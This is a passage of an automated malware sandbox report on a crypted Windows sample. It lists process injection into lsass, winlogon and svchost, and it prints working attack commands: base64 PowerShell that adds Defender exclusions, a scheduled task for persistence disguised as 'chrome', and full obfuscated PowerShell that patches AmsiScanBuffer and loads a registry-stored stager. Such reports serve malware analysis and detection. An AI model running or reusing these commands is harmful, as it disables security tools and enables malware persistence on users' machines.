Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BFF135D0
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14000E000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140019000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001B000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001C000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001D000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140056000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 44EB131010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000
.NET source code references suspicious native API functions
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\34432.exeThread register set: target process: 7056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2324
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
